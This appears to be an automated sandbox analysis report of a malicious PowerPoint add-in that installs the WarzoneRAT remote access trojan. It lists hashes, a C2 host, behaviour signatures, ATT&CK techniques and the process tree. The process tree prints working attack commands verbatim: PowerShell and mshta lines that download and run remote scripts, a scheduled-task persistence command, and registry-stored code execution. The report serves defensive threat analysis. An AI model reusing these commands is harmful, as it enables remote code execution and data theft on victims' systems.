Analysis

  • max time kernel
    90s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    17-07-2021 07:24

General

  • Target

    SO-19844 EIDCO.ppam

  • Size

    14KB

  • MD5

    24dd86688a277a16ca013809c71ab8c0

  • SHA1

    d3a1915ced9501a7ce269ee1ace23b4a50c8c5cd

  • SHA256

    643ce9630631fdc9051b4be5b3bd9d60281885380fb2fa777379711d938c3c91

  • SHA512

    89888f15eaacf0404e460830f497b2465bbaf75276e5cf5b0ae7420f50f9c00c4392479bb2cee291acbeefda71e4dd4d603b915244ed932d84608f8fc65b5119

Malware Config

Extracted

Family

warzonerat

C2

pstericdd.duckdns.org:9090

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Blocklisted process makes network request 17 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Modifies WinLogon 2 TTPs 4 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\SO-19844 EIDCO.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\SYSTEM32\mshta.exe
      mshta http://www.bitly.com/ashjdkqodasdasdasdwdhqowdh
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1304
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/psteric.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/1.txt').GetResponse().GetResponseStream()).ReadToend());
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3468
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
          4⤵
          • Loads dropped DLL
          • Modifies WinLogon
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4324
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          #cmd
          4⤵
            PID:4468
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@0v2x.blogspot.com/p/34.html\""
          3⤵
          • Creates scheduled task(s)
          PID:2304
      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
        "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3468
        2⤵
        • Process spawned suspicious child process
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\system32\dwwin.exe
          C:\Windows\system32\dwwin.exe -x -s 3468
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe ((gp HKCU:\Software).cookerr)|IEX
      1⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1672
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k networkservice -s TermService
      1⤵
      • Loads dropped DLL
      PID:4572
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
      1⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4604

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Winlogon Helper DLL

    1
    T1004

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \??\c:\program files\microsoft dn1\rdpwrap.ini
      MD5

      6bc395161b04aa555d5a4e8eb8320020

      SHA1

      f18544faa4bd067f6773a373d580e111b0c8c300

      SHA256

      23390dfcda60f292ba1e52abb5ba2f829335351f4f9b1d33a9a6ad7a9bf5e2be

      SHA512

      679ac80c26422667ca5f2a6d9f0e022ef76bc9b09f97ad390b81f2e286446f0658524ccc8346a6e79d10e42131bc428f7c0ce4541d44d83af8134c499436daae

    • \??\c:\program files\microsoft dn1\sqlmap.dll
      MD5

      461ade40b800ae80a40985594e1ac236

      SHA1

      b3892eef846c044a2b0785d54a432b3e93a968c8

      SHA256

      798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

      SHA512

      421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

    • \Program Files\Microsoft DN1\sqlmap.dll
      MD5

      461ade40b800ae80a40985594e1ac236

      SHA1

      b3892eef846c044a2b0785d54a432b3e93a968c8

      SHA256

      798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

      SHA512

      421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

    • \Program Files\Microsoft DN1\sqlmap.dll
      MD5

      461ade40b800ae80a40985594e1ac236

      SHA1

      b3892eef846c044a2b0785d54a432b3e93a968c8

      SHA256

      798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

      SHA512

      421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

    • \Users\Admin\AppData\Local\Temp\freebl3.dll
      MD5

      ef12ab9d0b231b8f898067b2114b1bc0

      SHA1

      6d90f27b2105945f9bb77039e8b892070a5f9442

      SHA256

      2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7

      SHA512

      2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193

    • \Users\Admin\AppData\Local\Temp\mozglue.dll
      MD5

      75f8cc548cabf0cc800c25047e4d3124

      SHA1

      602676768f9faecd35b48c38a0632781dfbde10c

      SHA256

      fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0

      SHA512

      ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f

    • \Users\Admin\AppData\Local\Temp\msvcp140.dll
      MD5

      109f0f02fd37c84bfc7508d4227d7ed5

      SHA1

      ef7420141bb15ac334d3964082361a460bfdb975

      SHA256

      334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

      SHA512

      46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

    • \Users\Admin\AppData\Local\Temp\nss3.dll
      MD5

      d7858e8449004e21b01d468e9fd04b82

      SHA1

      9524352071ede21c167e7e4f106e9526dc23ef4e

      SHA256

      78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db

      SHA512

      1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440

    • \Users\Admin\AppData\Local\Temp\softokn3.dll
      MD5

      471c983513694ac3002590345f2be0da

      SHA1

      6612b9af4ff6830fa9b7d4193078434ef72f775b

      SHA256

      bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f

      SHA512

      a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410

    • \Users\Admin\AppData\Local\Temp\vcruntime140.dll
      MD5

      7587bf9cb4147022cd5681b015183046

      SHA1

      f2106306a8f6f0da5afb7fc765cfa0757ad5a628

      SHA256

      c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

      SHA512

      0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

    • memory/808-262-0x0000000000000000-mapping.dmp
    • memory/856-114-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/856-115-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/856-116-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/856-117-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/856-119-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/856-118-0x00007FFC5CBE0000-0x00007FFC5E7BD000-memory.dmp
      Filesize

      27.9MB

    • memory/856-122-0x00007FFC59A20000-0x00007FFC5AB0E000-memory.dmp
      Filesize

      16.9MB

    • memory/856-123-0x00007FFC55990000-0x00007FFC57885000-memory.dmp
      Filesize

      31.0MB

    • memory/1304-254-0x0000000000000000-mapping.dmp
    • memory/1672-286-0x000002BAA0040000-0x000002BAA0041000-memory.dmp
      Filesize

      4KB

    • memory/1672-274-0x000002BA87A00000-0x000002BA87A01000-memory.dmp
      Filesize

      4KB

    • memory/1672-276-0x000002BA87950000-0x000002BA87952000-memory.dmp
      Filesize

      8KB

    • memory/1672-277-0x000002BA87953000-0x000002BA87955000-memory.dmp
      Filesize

      8KB

    • memory/2100-300-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/2100-302-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/2100-303-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/2100-301-0x00007FFC3AEC0000-0x00007FFC3AED0000-memory.dmp
      Filesize

      64KB

    • memory/2100-257-0x0000000000000000-mapping.dmp
    • memory/2304-267-0x0000000000000000-mapping.dmp
    • memory/3468-283-0x00000144A6853000-0x00000144A6855000-memory.dmp
      Filesize

      8KB

    • memory/3468-298-0x00000144A6856000-0x00000144A6858000-memory.dmp
      Filesize

      8KB

    • memory/3468-265-0x0000000000000000-mapping.dmp
    • memory/3468-313-0x00000144BEB70000-0x00000144BEB7D000-memory.dmp
      Filesize

      52KB

    • memory/3468-280-0x00000144A6850000-0x00000144A6852000-memory.dmp
      Filesize

      8KB

    • memory/3468-308-0x00000144BEB60000-0x00000144BEB63000-memory.dmp
      Filesize

      12KB

    • memory/4324-324-0x0000000004800000-0x000000000493C000-memory.dmp
      Filesize

      1.2MB

    • memory/4324-329-0x0000000004BA0000-0x0000000004C24000-memory.dmp
      Filesize

      528KB

    • memory/4324-318-0x0000000000400000-0x000000000055E000-memory.dmp
      Filesize

      1.4MB

    • memory/4324-310-0x0000000000405E28-mapping.dmp
    • memory/4324-309-0x0000000000400000-0x000000000055E000-memory.dmp
      Filesize

      1.4MB